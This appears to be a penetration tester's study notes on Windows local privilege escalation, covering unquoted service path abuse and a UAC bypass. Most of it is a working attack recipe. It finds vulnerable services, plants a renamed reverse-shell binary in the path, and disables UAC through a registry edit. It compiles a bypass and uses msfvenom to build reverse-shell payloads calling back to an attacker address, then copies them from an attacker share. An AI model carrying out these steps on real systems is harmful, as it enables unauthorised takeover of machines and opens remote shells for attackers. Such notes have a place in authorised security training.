Unquoted path Manual Exploitation

C:\Program Files directory, which contains a space character in its name.
Microsoft Windows Unquoted Service Path Vulnerability
Tenable®
 
​https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation​
Finding the correct binary path is possible Under services in Winpeas.
Also you can list the services with 
net start
wmic service list brief
sc query
Get-Service
 Services - Unquoted Paths
Conditions:
​
Path to service is unquoted and has spaces.
Running with LocalSystem or equivalent Administrative permissions.
User should have write permissions to a folder in the path.
User should have permission to start the service OR the service auto-restarts on shutdown/start-up.
Find unquoted paths with WMIC:
​
Find all services with "auto" start mode (automatically starts at system start-up),
cmd> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Exploit steps:
​
Find unquoted service binpaths, for services run as ADMIN e.g. binpath= C:\Program Files\A bad folder\adminservice.exe.
​
Check if you have FULL/WRITE (F)(W) permissions along path using:
​
a) icacls "C:\Program Files\folder\A unquoted folder\adminservice.exe"
​
b) accesschk.exe -ucqv [/path/to/unquoted/folder] -accepteula
​
Generate reverse shell payload and rename to path e.g. A.exe.
​
Place malicious binary in path, so that it is executed e.g. move A.exe "C:\Program Files\folder".
​
Execute by restarting computer (if service has startmode = auto) with shutdown /r /t 0.
​
User Account Control (UAC) Bypass
Even if you are a local admin, User Account Control (UAC) maybe turned on which may force your user to respond to UAC credential/consent prompts in order to perform privileged actions.
​
UAC bypass walkthrough: https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
STEP 1: Check if we should perform UAC bypass
​
cmd> whoami /priv    # do we have very few privileges even as local admin?
cmd> whoami /groups  # is "Mandatgory Label\XXX Mandatory Level" set to MEDIUM?
cmd> psexec.exe -i -accepteula -d -s rshell.exe # are we getting issues running psexec as SYSTEM?
​
# check if UAC turned on
cmd> reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
...
EnableLUA                  REG_DWORD 0x1 # if 0x1 = UAC ENABLED
ConsentPromptBehaviorAdmin REG_DWORD 0x5 # if NOT 0x0 = consent required
PromptOnSecureDesktop      REG_DWORD 0x1 # if 0x1 = Force all credential/consent prompts
...
​
# try to disable UAC
cmd> reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD
STEP 2: Prepare exploits
​
# modify uac-bypass.c to execute reverse shell
# compile w/ correct architecture
$ x86_64-w64-mingw32-gcc ~/OSCP-2022/Tools/privesc-windows/uac-bypass.c -o uac-bypass.exe
​
# generate reverse shell payload
$  msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=[kali] LPORT=666 -f exe -o rshell.exe
STEP 3: Transfer, setup listener and exec payload
​
cmd> copy \\[kali]\[share]\uac-bypass.exe uac-bypass.exe
cmd> copy \\[kali]\[share]\rshell.exe rshell.exe
cmd> .\uac-bypass.exe
​
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.129 LPORT=443 -f exe > program.exe
​
Windows XP SP0/SP1 Priv esc
Pass the hash
Last modified 9mo ago